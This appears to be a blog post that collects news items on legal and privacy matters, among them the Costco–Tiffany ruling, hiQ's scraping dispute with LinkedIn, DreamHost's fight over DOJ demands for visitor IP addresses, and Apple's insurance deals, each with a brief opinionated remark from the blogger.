Costco’s management “displayed at best a cavalier attitude toward Costco’s use of the Tiffany name in conjunction with ring sales and marketing,” U.S. District Judge of the Southern District of New York Laura Taylor Swain wrote in her opinion.
   Swain wrote Costco “provided credible evidence” of the practice of using the terms “Tiffany setting” and “Tiffany style” generically throughout the jewelry industry.
The problem is Costco only used the word “Tiffany” when describing the rings in its signage, suggesting they were made by the jeweler rather than an imitation of its famous design.


This is obvious, isn’t it?
Judge says LinkedIn can't block startup from user’s public data
Judge Edward Chen in the northern district of California granted hiQ labs, an employment startup, a preliminary injunction that forces LinkedIn to remove any barriers keeping hiQ from accessing public profile information within 24 hours. 
HiQ’s operations depend on its ability to access public LinkedIn data.  The company sells analytics to clients including eBay, Capital One and GoDaddy that aim to help them with employee retention and recruitment. 
   LinkedIn argued that users might not want to have employers tracking changes on their profiles, for example if they are seeking a new job.
In his order, Chen argued that LinkedIn’s argument was flawed.
   HiQ argues that Linkedin’s attempts to limit the startup’s ability to use public profile data is anti-competitive and is a violation of so-called data-scrappers free speech rights.


Taking the lead from the President or something DoJ thought up on their own? 
DreamHost fights government request seeking 1.3 million IP addresses of DisruptJ20 website visitors
Webhosting service DreamHost has said that the U.S. Department of Justice (DOJ) has requested information on everyone who visited DisruptJ20.org, a website that was set up to organize political protests against the U.S. administration. 
   Central to the request was information on the DistrupJ20.org website itself and its owner, but where things get contentious is in relation to the site’s visitors.  According to DreamHost, the DOJ’s request includes 1.3 million IP addresses covering each device that connected to the website.  This was in addition to “…contact information, email content, and photos of thousands of people — in an effort to determine who simply visited the website,” according to a blog post.  “This is, in our opinion, a strong example of investigatory overreach and a clear abuse of government authority,” the DreamHost statement added.
After challenging the DOJ’s request based on the “overbreadth” of the warrant, DreamHost received a copy of an “order to compel” filed by the DOJ in the Superior Court of the District of Columbia that sought to dismiss DreamHost’s counterarguments.  Last week, DreamHost filed its legal arguments in response.


Will this improve health or allow Aetna to more accurately calculate their risk? 
Apple and Aetna reportedly held secret meetings, plan to offer Apple Watch to 23 million insurance customers
Top executives from both companies met last Thursday and Friday in Southern California, according to CNBC. Myoung Cha, who heads up Apple’s special health projects, led the talks, with hospital chief medical information officers from across the U.S. also in attendance.
   Aetna currently provides the Apple Watch to its more than 50,000 staffers.  The Hartford, Conn.-based insurance company also announced last September that it would subsidize the cost of Apple Watches for select large employers and individual customers.

(Related)  True or not, would this change the perception of Apple/Cisco security? 
Apple and the future of the insurance industry
   Apple CEO Tim Cook joined Cisco CEO, Chuck Robbins at Cisco Live to reveal the firms are working to deliver lower cost cybersecurity insurance to customers choosing to use Cisco equipment in combination with Apple kit.
"If your company is using Cisco and Apple, then the combination of these should make that insurance cost significantly less for you than it would if you were using some other personal network side and the other operating system in the mobile area," Cook said.
The idea is that insurers will be convinced to deliver lower premiums to enterprises who standardize around Apple/Cisco solutions.
Those who do will not be required to subsidize those who choose to use less secure combinations.


A great victory for the Dear Leader!  And no doubt the President will take full credit for it.
North Korea Stands Down On Threat To Guam


This has not been a problem with my students, but it might be useful in other classes.
Library Guides for Detecting Fake News – AALL Spectrum July 2017
by on


I would never, ever do this. 


I should remind my students, but I bet they all know about this.